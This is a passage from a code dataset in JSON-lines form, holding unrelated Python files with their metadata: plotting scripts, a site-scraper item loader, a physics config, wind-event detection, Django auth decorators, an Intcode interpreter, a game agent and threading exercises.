plot_mean_total_energy(df, net):\n plot_mean_metric(df, \"total_energy\", net, MEGA)\n plt.title(f\"[{net}]Mean Total Energy vs. Power Limit\")\n plt.ylabel(\"Energy [MJ]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-total-energy.png\")\n\n\n#plot_mean_total_energy(mnist_data_big, \"MNIST-Big\")\n\n\n#%%\ndef plot_mean_edp(df, net):\n plot_mean_metric(df, \"edp\", net, MEGA)\n plt.title(f\"[{net}]Mean EDP vs. Power Limit\")\n plt.ylabel(\"Energy Delay Product [MJs]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-edp.png\")\n\n#plot_mean_edp(mnist_data_big)\n\n\n#%%\ndef plot_mean_total_time(df, net):\n plot_mean_metric(df, \"total_time\", net, 1) \n plt.title(f\"[{net}]Mean Total Time vs. Power Limit\")\n plt.ylabel(\"Time [s]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-mean-total-time.png\")\n\n\nimport matplotlib\nmatplotlib.use('Agg')\nfig_root = Path(\"../report/fig\")\nfig_root.mkdir(parents=True, exist_ok=True)\n\n# mnist_data_big = load_power_cap_data(\"../data/data-1.2\", \"mnist-big\", epoch_count = 10)\n# mnist_data_big = pd.DataFrame(mnist_data_big)\n# plot_all(mnist_data_big, \"mnist-big\")\n\n\n# mnist_data_small = load_power_cap_data(\"../data/data-1.2\", \"mnist-2\", epoch_count = 10)\n# mnist_data_small = pd.DataFrame(mnist_data_small)\n# plot_all(mnist_data_small, \"mnist-small\")\n\necg_data = load_power_cap_data(\"../data/data-1.3.1\", \"ecg\", epoch_count = 5)\necg_data = pd.DataFrame(ecg_data)\nplot_all(ecg_data, \"ecg\")","sub_path":"gpyjoules/make_plots_ecg.py","file_name":"make_plots_ecg.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"582758316","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nfrom abc import ABCMeta\r\nfrom erobot.items.enkou55_items import Enkou55JPTitleImageItem\r\nfrom erobot.configs.enkou55_xpath_config import Enkou55ImageXPathConfig\r\nfrom erobot.contrib.title_image_item_loader import TitleImageItemLoader\r\nfrom erobot.utils.items import get_image_name\r\n\r\n\r\nclass Enkou55TitleImageItemLoader(TitleImageItemLoader):\r\n __metaclass__ = ABCMeta\r\n \r\n def __init__(self, item, response):\r\n super(Enkou55TitleImageItemLoader, self).__init__(item, response,\r\n Enkou55ImageXPathConfig().title.image_urls)\r\n \r\n def __getitem__(self, key):\r\n image_urls = []\r\n if key == 'face' or key == 'thumbnail':\r\n image_urls = self._hxs.select(self._xpath_config[key]).extract()\r\n elif key == 'player':\r\n pattern = re.compile(r'http://.*\\.enkou55.com/images/title/\\d{2}/\\d{2}/\\d{2}/player.jpg')\r\n if self._hxs.select(self._xpath_config[key]).extract():\r\n image_urls = [re.search(pattern, self._hxs.select(self._xpath_config[key]).extract()[0]).group()]\r\n elif key in self.keys():\r\n pass\r\n else:\r\n raise KeyError(key)\r\n if image_urls:\r\n return [{'name': get_image_name(image_url), 'original_url': image_url} for image_url in image_urls]\r\n \r\n \r\nclass Enkou55JPTitleImageItemLoader(Enkou55TitleImageItemLoader):\r\n def __init__(self, response):\r\n super(Enkou55JPTitleImageItemLoader, self).__init__(Enkou55JPTitleImageItem(), response)\r\n","sub_path":"erovideo/erobot/contrib/enkou55/enkou55_title_image_item_loader.py","file_name":"enkou55_title_image_item_loader.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"406803083","text":"import FWCore.ParameterSet.Config as cms\n\npfClustersFromHGC3DClustersEM = cms.EDProducer(\"PFClusterProducerFromHGC3DClusters\",\n src = cms.InputTag(\"hgcalTriggerPrimitiveDigiProducer\",\"cluster3D\"),\n emOnly = cms.bool(True),\n etMin = cms.double(0.0), \n corrector = cms.string(\"L1Trigger/Phase2L1ParticleFlow/data/ecorr.root\"),\n resol = cms.PSet(\n etaBins = cms.vdouble( 1.300, 1.700, 2.800, 3.200),\n offset = cms.vdouble( 1.158, 1.545, 0.732, 0.551),\n scale = cms.vdouble( 0.014, 0.024, 0.028, 0.031),\n kind = cms.string('calo'),\n )\n)\n","sub_path":"Phase2L1ParticleFlow/python/pfClustersFromHGC3DClustersEM_cfi.py","file_name":"pfClustersFromHGC3DClustersEM_cfi.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261259628","text":"# Extreme events detection\n# \n# According to IEC standards there are 6 main classes of exteme events:\n# \n# - Extreme wind speed model (EWM)\n# - Extreme operating gust (EOG)\n# - Extreme turbuelnce model (ETM)\n# - Extreme direction change (EDC)\n# - Extreme coherent gust wind direction change (ECD)\n# - Extreme wind shear (EWS)\n# \n# Each of these are to be quantified through the high resolution data, as they typically happen over a range of < 10s.\n\n# fundamentals\nimport os, glob\nimport numpy as np\nimport pandas as pd\nfrom calendar import monthrange, month_name\nimport scipy.stats as stats\nimport datetime\nimport imp\nimport scipy.io as sio\nimport pickle as pkl\n\n# met mast functions and utilities\nimport met_funcs as MET\n\n\n# time range\n# years = [ int(a) for a in np.arange(2012,2019,1) ] #\nmonths = [ int(a) for a in np.arange(1,12.1,1) ]\ndays = [int(a) for a in np.arange(1,31.1,1)]\n\n# paths (must mount volume smb://nrel.gov/shared/wind/WindWeb/MetData/135mData/)\ntowerID = 'M5'\nfigPath = '../../figs/{}'.format(towerID)\n\nmetDataPath = '/Volumes/135mData/{}Twr/20Hz/mat/'.format(towerID)\n\n#################\n# read data, look for events, save time index\n#################\n\nyears = [2017,2018]\n# months = [4]\n# days=[1]\nprobeheight=100\n \ntry:\n savepath = '/Users/nhamilto/Documents/Wake_Dynamics/SiteChar/data/IEC'\n os.makedirs(savepath)\nexcept:\n pass\n\nfor year in years:\n for month in months:\n \n # begin empty lists for events\n Ve01events = []\n Ve50events = []\n EOGevents = []\n ETMevents = []\n EDCevents = []\n ECDevents = []\n EWSevents = []\n \n print('reading 20Hz data for {}/{}'.format(year,month))\n\n for day in days:\n datapath = os.path.join(metDataPath,str(year),str(month).zfill(2),str(day).zfill(2))\n\n # establish existence of directory\n try:\n fPaths = os.listdir(datapath)\n except:\n continue\n \n if len(fPaths) is 0:\n continue\n \n for filenum, file in enumerate(fPaths):\n \n # load data\n try:\n data = sio.loadmat(os.path.join(datapath,file))\n except:\n continue\n \n # if data is not complete, move on. No need to fight here.\n ndat = 10*60*20 # minutes*seconds/minute*samples/second\n if len(data['Sonic_CupEqHorizSpeed_100m'][0][0][0].flatten()) != 12000:\n continue\n \n # make a vector of datetimes for the data\n timerange = MET.make_datetime_vector(file)\n # make a dataframe for the instrument at probeheight\n sonicdat = MET.make_dataframe_for_height(data, timerange, probeheight=probeheight)\n temp = sonicdat['Sonic_CupEqHorizSpeed_100m'].dropna()\n if len(temp)<1000:\n continue\n \n # extract variables needed for classificiation of IEC events\n cupspeed, winddir, sigma_data, params = MET.setup_IEC_params(sonicdat, probeheight=100)\n \n # look for extreme wind speed model events\n Ve01eventfound, Ve50eventfound = MET.find_EWM_events(cupspeed, params)\n Ve01events.extend(Ve01eventfound)\n Ve50events.extend(Ve50eventfound)\n \n # look for extreme operating gust events\n EOGeventfound = MET.find_EOG_events(cupspeed, params)\n EOGevents.extend(EOGeventfound)\n \n # look for extreme turbulence model events\n ETMeventfound = MET.find_ETM_events(cupspeed, sigma_data, params)\n ETMevents.extend(ETMeventfound)\n\n # look for extreme direction change events\n EDCeventfound = MET.find_EDC_events(cupspeed, winddir, params)\n EDCevents.extend(EDCeventfound)\n \n # look Extreme coherent gust with direction change events\n ECDeventfound = MET.find_ECD_events(cupspeed, winddir, params)\n ECDevents.extend(ECDeventfound)\n \n # look Extreme wind shear events\n EWSeventfound = MET.find_EWS_events(cupspeed, params)\n EWSevents.extend(EWSeventfound)\n \n # save the data for each month \n eventlist = {'EWS_Ve01': Ve01events, \n 'EWS_Ve50': Ve50events, \n 'EOG': EOGevents, \n 'ETM': ETMevents, \n 'EDC': EDCevents, \n 'ECD': ECDevents, \n 'EWS': EWSevents} \n \n filename = 'IEC_events_{}_{}.pkl'.format(year,month)\n savefile = os.path.join(savepath,filename)\n with open(savefile, 'wb') as f:\n pkl.dump(eventlist, f, pkl.HIGHEST_PROTOCOL)\n \nprint('done')\n\n\n# demo load data\nloadfile = savefile\n# loadfile = '/Users/nhamilto/Documents/Wake_Dynamics/SiteChar/data/IEC/IEC_events_2015_1.pkl'\nwith open(loadfile, 'rb') as f:\n test= pkl.load(f)\nfor key in test:\n print(len(test[key]))\n\n","sub_path":"scripts/IEC_extreme_events.py","file_name":"IEC_extreme_events.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"242352071","text":"\"\"\"Module containing helper decorators for user authentication.\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom functools import wraps\n\nfrom .response import Http400, Http403, Http404, Http500\n\nimport json\n\ndef check_json(func):\n \"\"\"Checks that the request's body has valid JSON, and sets kwargs['json']\n to the serialized data.\"\"\"\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n try: # attaches the json to the view instance\n self.json_data = json.loads(request.body.decode('utf-8'))\n except:\n return Http400('Your JSON is invalid')\n return func(self, request, *args, **kwargs)\n return wrapper\n\ndef authenticated(func):\n \"\"\"Makes sure that a user is authenticated to view a post.\"\"\"\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n return Http403(\"You are not authenticated\")\n return func(self, request, *args, **kwargs)\n return wrapper\n \n\ndef authenticated_and_authorized(model=None, model_filters=None):\n \"\"\"Checks that a user a authenticated and authorized to edit an object\n in a model. Specific filters which are passed into the url parameters\n should bet in a list set into model_filters. This should not be a tuple!.\n \"\"\"\n filters = {}\n if model == None:\n return Http500('An error occured')\n def callable(func):\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n if 'username' in model_filters:\n # Check for username in the model_filters\n try:\n model_filters.remove('username')\n except: # This would be an annoying error to debug\n raise Exception(\"You can only pass a list into the \"\n \"model_filters kwarg in the authenticated_and_authorized \"\n \"decorator\")\n # Set the user into the filters\n username = kwargs.get('username')\n try:\n user = get_user_model().objects.get(username=username)\n filters['user'] = user\n except:\n return Http404(\"The user attached to this mode does not \"\n \"exist.\")\n # Add the rest of the model filters\n for model_filter in model_filters:\n filters[model_filter] = kwargs.get(model_filter)\n # Attempt to check that a model attached to the user exists\n if len(model_filters) > 0:\n try:\n obj = model.objects.get(**filters)\n username = obj.user.username\n self.user = obj.user \n # attaches the user to the view instance\n except Exception as e:\n return Http404('This object does not exist')\n else:\n username = kwargs.get('username')\n # Finally check if the attached user is the user logged in\n if request.user.is_authenticated() and \\\n (request.user.username == username):\n return func(self, request, *args, **kwargs)\n else:\n return Http403(\"You are not authorized to edit this object\")\n return wrapper\n return callable \n","sub_path":"BoulderDjangoDev/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383782871","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nfrom google.appengine.api import urlfetch\nimport highlighter\nfrom dict_to_protobuf import decode_dictionary\nfrom server.highlighter import highlight\nfrom datastore_entities import PageEntity\nfrom short_url import decode_url\n\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n\n dummy2 = {\"commonPath\": [\n {\"firstClass\": \"device_desktop\", \"firstClassIndex\": 0, \"index\": 0, \"nodeName\": \"body\"},\n {\"firstClass\": \"container\", \"firstClassIndex\": 3, \"id\": \"content\", \"idIndex\": 0, \"index\": 10,\n \"nodeName\": \"div\"},\n {\"firstClass\": \"container\", \"firstClassIndex\": 1, \"index\": 2, \"nodeName\": \"div\"}],\n \"endOffset\": 102, \"endPath\": [\n {\"firstClass\": \"cikk-torzs\", \"firstClassIndex\": 0, \"index\": 3, \"nodeName\": \"div\"},\n {\"index\": 0, \"nodeName\": \"blockquote\"}, {\"index\": 0, \"nodeName\": \"p\"},\n {\"index\": 0, \"nodeName\": \"#text\"}], \"startOffset\": 429, \"startPath\": [\n {\"firstClass\": \"lead\", \"firstClassIndex\": 0, \"index\": 2, \"nodeName\": \"div\"},\n {\"index\": 0, \"nodeName\": \"#text\"}],\n \"url\": \"http://index.hu/belfold/2015/02/10/kilakoltatas_apolasi_segely_inkasszo_csapda/\"}\n\n # request = highlighter.CreatePageRequest()\n # dict_to_protobuf(dummydata, request)\n request = decode_dictionary(highlighter.CreatePageRequest, dummy2)\n\n (error_string, processed_html, original_http_headers) = highlighter.highlight(request)\n\n if error_string is None:\n self.response.headers = original_http_headers\n self.response.write(processed_html)\n else:\n self.response.write(error_string)\n\n\n # if result.status_code == 200:\n\n\nclass ShortURLHandler(webapp2.RequestHandler):\n def get(self, short_url):\n key = decode_url(short_url)\n page_entity = PageEntity.get_by_id(key)\n self.response.write(page_entity.html)\n\n\n\n\napp = webapp2.WSGIApplication([\n (r'/', MainHandler),\n (r'/(.*)', ShortURLHandler),\n ], debug=True)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600810088","text":"import sys\nimport itertools\nimport collections\n\n\ndef val(arr, idx, mode):\n # position mode\n if mode == 0:\n return arr[arr[idx]]\n # intermediate mode\n elif mode == 1:\n return arr[idx]\n raise RuntimeError('xxx')\n\n\ndef process(arr):\n arr = arr[:]\n pc = 0\n length = {1: 4, 2: 4, 3: 2, 4: 2, 5: 3, 6: 3, 7: 4, 8: 4, 99: 0}\n while 1:\n mode, op = divmod(arr[pc], 100)\n m2, m1 = divmod(mode, 10)\n if op == 1:\n arr[arr[pc+3]] = val(arr, pc+1, m1) + val(arr, pc+2, m2)\n elif op == 2:\n arr[arr[pc+3]] = val(arr, pc+1, m1) * val(arr, pc+2, m2)\n elif op == 3:\n x = yield\n if x is None:\n return\n arr[arr[pc+1]] = x\n elif op == 4:\n yield val(arr, pc+1, m1)\n elif op == 5:\n if val(arr, pc+1, m1) != 0:\n pc = val(arr, pc+2, m2)\n continue\n elif op == 6:\n if val(arr, pc+1, m1) == 0:\n pc = val(arr, pc+2, m2)\n continue\n elif op == 7:\n arr[val(arr, pc+3, 1)] = 1 \\\n if val(arr, pc+1, m1) < val(arr, pc+2, m2) \\\n else 0\n elif op == 8:\n arr[val(arr, pc+3, 1)] = 1 \\\n if val(arr, pc+1, m1) == val(arr, pc+2, m2) \\\n else 0\n elif op == 99:\n return\n else:\n raise RuntimeError('yyy')\n pc += length[op]\n\n\ndef sol1(arr):\n m = 0\n\n def call(arg1, arg2):\n vm = process(arr)\n next(vm)\n vm.send(arg1)\n return vm.send(arg2)\n\n for a, b, c, d, e in itertools.permutations([0, 1, 2, 3, 4]):\n r = call(e, call(d, call(c, call(b, call(a, 0)))))\n m = max(m, r)\n return m\n\n\ndef sol2(arr):\n m = 0\n\n def newvm(init):\n vm = process(arr)\n next(vm)\n vm.send(init)\n return vm\n return m\n\n\ndef main():\n data = [int(x) for x in sys.stdin.readline().split(',')]\n print(sol1(data))\n print(sol2(data))\n\n\nmain()\n","sub_path":"adventofcode/2019/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108819874","text":"import pygame\n\nclass ShipPlayer02():\n\n def __init__(self, ai_settings, screen):\n \"\"\"Inicializa a espaçonave 2 e define sua posição inicial\"\"\"\n\n self.screen = screen\n self.ai_settings = ai_settings\n\n self.image = pygame.image.load('images/ship_green.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n self.rect.centerx = self.screen_rect.centerx + 200\n self.rect.bottom = self.screen_rect.bottom - 40\n\n self.centerx = float(self.rect.centerx)\n self.centery = float(self.rect.centery)\n\n #flag de movimento\n self.moving_up_01 = False\n self.moving_down_01 = False\n self.moving_right_01 = False\n self.moving_left_01 = False\n\n def update(self):\n\n if self.moving_up_01 and self.rect.top > 400:\n self.centery -= self.ai_settings.ship_speed_factor_player2\n if self.moving_down_01 and self.rect.bottom < 500:\n self.centery += self.ai_settings.ship_speed_factor_player2\n if self.moving_left_01 and self.rect.left > 400:\n self.centerx -= self.ai_settings.ship_speed_factor_player2\n if self.moving_right_01 and self.rect.right < self.screen_rect.right:\n self.centerx += self.ai_settings.ship_speed_factor_player2\n\n self.rect.centerx = self.centerx\n self.rect.centery = self.centery\n\n def blitme(self):\n\n self.screen.blit(self.image, self.rect)\n\n def center_ship_player2(self):\n \"\"\"Centraliza a espaçonave 2 na tela\"\"\"\n self.centerx = 600\n self.centery = 460\n","sub_path":"alien_invasion_2/ship_player2.py","file_name":"ship_player2.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"285231305","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 12:33:51 2018\n\n@author: hardik\n\"\"\"\nimport numpy as np\nfrom pommerman import agents\nfrom keras.models import load_model\n\nclass RL_learned_agent(agents.BaseAgent):\n def __init__(self):\n super().__init__()\n self.actor_model = load_model('actor_model_RL.h5')\n \n def act(self, obs, action_space):\n \n def featurize(obs):\n \n board = obs['board']\n \n # convert board items into bitmaps\n maps = [board == i for i in range(10)]\n maps.append(obs['bomb_blast_strength'])\n maps.append(obs['bomb_life'])\n \n # duplicate ammo, blast_strength and can_kick over entire map\n maps.append(np.full(board.shape, obs['ammo']))\n maps.append(np.full(board.shape, obs['blast_strength']))\n maps.append(np.full(board.shape, obs['can_kick']))\n \n # add my position as bitmap\n position = np.zeros(board.shape)\n position[obs['position']] = 1\n maps.append(position)\n \n # add teammate\n if obs['teammate'] is not None:\n maps.append(board == obs['teammate'].value)\n else:\n maps.append(np.zeros(board.shape))\n \n # add enemies\n enemies = [board == e.value for e in obs['enemies']]\n maps.append(np.any(enemies, axis=0))\n \n old_state = np.stack(maps, axis=2)\n \n augmented_mat = obs['board'].copy()\n augmented_mat[np.where((obs['board'] == 6) | (obs['board'] == 7) | (obs['board'] == 8))] = 0 # Powerups\n augmented_mat[np.where(obs['board'] == 2)] = 1 # wooden Wall\n augmented_mat[np.where(obs['board'] == 0)] = 2 # Passage\n augmented_mat[np.where(obs['board'] == 5)] = 3 # Fog\n augmented_mat[np.where((obs['board'] == obs['enemies'][0].value) | (obs['board'] == obs['enemies'][1].value))] = 4 # enemy\n augmented_mat[np.where(obs['board'] == 1)] = 5 # Rigid Wall\n augmented_mat[np.where(obs['board'] == obs['teammate'].value)] = 6 # Teammate\n augmented_mat[np.where(obs['board'] == 3)] = 7 # Bomb\n augmented_mat[np.where(obs['board'] == 4)] = 8 # Flames\n augmented_mat[augmented_mat > 8] = 6 # Own value with teammate\n \n new_obs_cust = np.concatenate([old_state, augmented_mat.reshape((augmented_mat.shape[0], augmented_mat.shape[1], 1))], axis=-1)\n \n return new_obs_cust\n \n feat = featurize(obs)\n probs = self.actor_model.predict(feat[np.newaxis])\n \n action = np.argmax(probs)\n return action.item()","sub_path":"pommerman/agents/RL_agent.py","file_name":"RL_agent.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31999673","text":"# CSC 242-501\r\n# Lab 1\r\n# James Hagle\r\n# Put the names of your collaborator(s) here\r\n\r\ndef printMinMax():\r\n lst = []\r\n while True:\r\n num=eval(input(\"Please enter a number: \"))\r\n if num > 0:\r\n lst.append(num)\r\n else:\r\n break\r\n if lst == []:\r\n print(\"No positive numbers entered\")\r\n else:\r\n lst.sort()\r\n print(\"The maximum is\",lst[-1])\r\n print(\"The minimum is\",lst[0])\r\n \r\n \r\ndef printWordsLines(fname):\r\n infile = open(fname, 'r')\r\n s = infile.readlines()\r\n infile.close()\r\n infile = open(fname, 'r')\r\n t = infile.read()\r\n infile.close()\r\n wrds = t.split()\r\n print(\"The file\",fname,\"contains\",len(s),\"lines and\",len(wrds),\"words\")\r\n","sub_path":"CSC241-Python1/Labs/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389422751","text":"import matplotlib.pyplot as plt\nfrom MyTriang import *\n\nT = Triangulation()\n\nT.load_msh(\"anulus.msh\")\n\nTAcc = TriaAccessor(T)\nTIt = TriaIterator(TAcc)\n\nplt.figure()\n\nprint(\"\\n\\tstarting loop:\")\nfor MyIt in TIt:\n X = np.append(TAcc.get_nodes_x(), TAcc.get_nodes_x()[0])\n Y = np.append(TAcc.get_nodes_y(), TAcc.get_nodes_y()[0])\n plt.plot(X, Y)\n\n# plt.show()\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.axes().set_aspect(\"equal\")\nplt.savefig(\"mesh_plot.png\")\n","sub_path":"D7-hands-on/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"53114528","text":"# This program allows the user to approximate a solution to an initial value problem for a differential equation,\r\n# and then works out the analytical solution using integration with an integrating factor.\r\n\r\n# Importing matplot to be able to create graphs of solutions, and math for exponential.\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n# Here I declare arrays, firstly 'step_sizes' which contains the different step sizes, and then also arrayX and arrayY\r\n# in order to store the resulting x and y values.\r\nstep_sizes = [1,0.2,0.05]\r\n# Do you really need two types of arrays? Perhaps arrayX and arrayY could already be 2d?\r\narrayX = [[],[],[]]\r\narrayY = [[],[],[]]\r\n\r\n# EULER'S METHOD: Here is where the program performs Euler's method. Firstly i use y(0) = -3, to store the initial x\r\n# and y values. The relevant step size is then chosen.\r\nfor i in range(0,3):\r\n x = 0\r\n y = -3\r\n step_size = step_sizes[i]\r\n for i in range(0,int(5/step_size) + 1):\r\n # In this for loop, I append the x and y values to the array, and then I use a mathematical expression on line\r\n # 24 to apply Euler's method. The value x is then increased by the step size.\r\n arrayX[i].append(x)\r\n arrayY[i].append(y)\r\n y += step_size * (x + y/5)\r\n x += step_size\r\n\r\n# The arrays are then segmented at the relevant points, and added to a larger array.\r\n#cutoffsX = [arrayX[:6],arrayX[6:32],arrayX[32:]]\r\n#cutoffsY = [arrayY[:6],arrayY[6:32],arrayY[32:]]\r\n\r\n# ANALYTICAL METHOD: Here is where the program performs the analytical method. Working out for the mathematical\r\n# expression on line 46 can be found in the 'Working.txt'.\r\n# perhaps array above could be called EulerArray and this one AnalyticalArray?\r\nrealArrayX = []\r\nrealArrayY = []\r\nfor i in range(0,3):\r\n # Same declarations as in Euler's method.\r\n x = 0\r\n y = -3\r\n step_size = step_sizes[i]\r\n for i in range(0,int(5/step_size) + 1):\r\n # This is the main mathematical loop. The program plugs in the x value into the expression to get the accurate\r\n # answer for the value of y. The step size is then incremented.\r\n realArrayX.append(x)\r\n realArrayY.append(y)\r\n y = (-5 * x) - 25 + (22 * math.exp(x/5))\r\n x += step_size\r\n\r\n# Arrays are segmented again.\r\nrealCutoffsX = [realArrayX[:6],realArrayX[6:32],realArrayX[32:]]\r\nrealCutoffsY = [realArrayY[:6],realArrayY[6:32],realArrayY[32:]]\r\n\r\n# This final for loop is then used to create the graphs.\r\nfor i in range(0,3):\r\n # Using the matplotlib library, I first create the parameters for the graph with .plot (plots coordinates), .axis\r\n # (defines range of axis) and .label (labels the axis). The graphs are then displayed to the user.\r\n plt.plot(arrayX[i], arrayY[i], 'ro', label=\"numerical\")\r\n plt.plot(realCutoffsX[i], realCutoffsY[i], '-', label=\"analytical\")\r\n plt.axis([0,5,-4,10])\r\n plt.xlabel(\"x\")\r\n plt.ylabel(\"y\")\r\n plt.title(\"Numerical vs Analytical Method\")\r\n plt.legend()\r\n plt.show()\r\n","sub_path":"Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420468613","text":"#operating systems\r\n#semaphores\r\n'''import threading\r\nfrom time import sleep\r\nsem=threading.Semaphore()\r\ndef func1():\r\n\tprint(\"function1 starting\")\r\n\tsem.acquire()\r\n\tfor i in range(1,5):\r\n\t\tprint(\"fucntion1 working in loop\")\r\n\t\tsleep(1)\r\n\tsem.release()\r\n\tprint(\"fucntion1 finsished\")\r\ndef func2():\r\n\tprint(\"function2 starting\")\r\n\twhile not sem.acquire(blocking=False):\r\n\t\tprint(\"function2 no semaphore available\")\r\n\t\tsleep(1)\r\n\telse:\r\n\t\tprint(\"got semaphore\")\r\n\t\tfor i in range(1,5):\r\n\t\t\tprint(\"function2 working \")\r\n\t\t\tsleep(1)\r\n\t\tsem.release()\r\nt1=threading.Thread(target=func1)\r\nt2=threading.Thread(target=func2)\r\nt1.start()\r\nt2.start()\r\nt1.join()\r\nt2.join()\r\nfrom threading import *\r\nclass medicalseat:\r\n\tdef __init__(self,avail_seat):\r\n\t\tself.avail_seat=avail_seat\r\n\t\tself.lock=BoundedSemaphore(2)\r\n\t\tprint(self.lock)\r\n\tdef reserve_seat(self,need_seat):\r\n\t\tself.lock.acquire()\r\n\t\t#two threads will start simultaneous execution since we gave value as 2\r\n\t\t#once atleast one thread comes out from the code within acquire and release\r\n\t\t#other thread i.e 3rd thread cannot access the piece of code between acquire and release\r\n\t\tprint(self.lock._value)\r\n\t\tprint('available seats',self.avail_seat)\r\n\t\tif(self.avail_seat>=need_seat):\r\n\t\t\tname=current_thread().name\r\n\t\t\tprint(\"seat allocated for\",name)\r\n\t\t\tself.avail_seat-=need_seat\r\n\t\telse:\r\n\t\t\tprint('no more seats')\r\n\t\tself.lock.release()\r\n\t\t#self.lock.release()\r\n\t\t#self.lock.release()\r\nm=medicalseat(2)\r\nt1=Thread(target=m.reserve_seat,args=(1,),name='rama')\r\nt2=Thread(target=m.reserve_seat,args=(1,),name='devi')\r\nt3=Thread(target=m.reserve_seat,args=(1,),name='kavitha')\r\nt1.start()\r\nt2.start()\r\nt3.start()\r\nt1.join()\r\nt2.join()\r\nt3.join()\t\t\r\n'''\r\n'''\r\nstring='ABCDEFGH'\r\nstring='abcdefgh'\r\n\r\noutput: aaBBgg\r\n\r\nfrom threading import *\r\nimport sys\r\nimport time\r\nimport random\r\nlock=Lock()\r\ndef f1():\r\n s='ABCDEFGH'\r\n for i in range(0,len(s)):\r\n lock.acquire()\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n time.sleep(int(random.random()*3))\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n lock.release()\r\n time.sleep(int(random.random()*3))\r\ndef f2():\r\n s='abcdefgh'\r\n for i in range(0,len(s)):\r\n lock.acquire()\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n time.sleep(int(random.random()*3))\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n lock.release()\r\n time.sleep(int(random.random()*3))\r\n\r\nt1=Thread(target=f1)\r\nt2=Thread(target=f2)\r\nt1.start()\r\nt2.start()\r\nt1.join()\r\nt2.join() \r\n \r\n\r\nimport time\r\nimport sys\r\nfor i in range(10):\r\n print(i,end='')\r\n sys.stdout.flush()\r\ntime.sleep(1)\r\n\r\n#producer consumer problem\r\nfrom threading import Thread, Lock, Condition\r\nimport time,random\r\nqueue=[]\r\nlock=Lock()\r\n#condition object allows one or more threads to wait until notofied by another thread\r\ncondition=Condition()#wait and notify\r\nclass producer(Thread):\r\n def run(self):\r\n nums=range(5)\r\n global queue\r\n while True:\r\n num=random.choice(nums)\r\n lock.acquire()\r\n queue.append(num)\r\n print('produced',num)\r\n lock.release()\r\n time.sleep(random.random())\r\nclass consumer(Thread):\r\n def run(self):\r\n global queue\r\n while True:\r\n lock.acquire()\r\n if not queue:\r\n print('nothing in queue')\r\n num=queue.pop(0)\r\n print('consumed',num)\r\n lock.release()\r\n time.sleep(random.random())\r\n\r\nproducer().start()\r\nconsumer().start()\r\n\r\n\r\n#condition objects\r\nfrom threading import Thread, Condition\r\nimport time\r\nimport random\r\n\r\nqueue=[]\r\nMAX_NUM=10\r\ncondition=Condition()\r\nclass ProducerThread(Thread):\r\n def run(self):\r\n nums=range(5)\r\n global queue\r\n while True:\r\n condition.acquire()\r\n if len(queue)==MAX_NUM:\r\n print(\"queue is full,producer is waiting\")\r\n condition.wait()\r\n print(\"space in queue,consumer notified the producer\")\r\n num=random.choice(nums)\r\n queue.append(num)\r\n print('produced',num)\r\n condition.notify()\r\n condition.release()\r\n time.sleep(random.random())\r\nclass ConsumerThread(Thread):\r\n def run(self):\r\n global queue\r\n while True:\r\n condition.acquire()\r\n if not queue:\r\n print('queue is empty, consumer is waiting')\r\n condition.wait()\r\n print('producer added something to queue')\r\n num=queue.pop(0)\r\n print('consumed',num)\r\n condition.notify()\r\n condition.release()\r\n 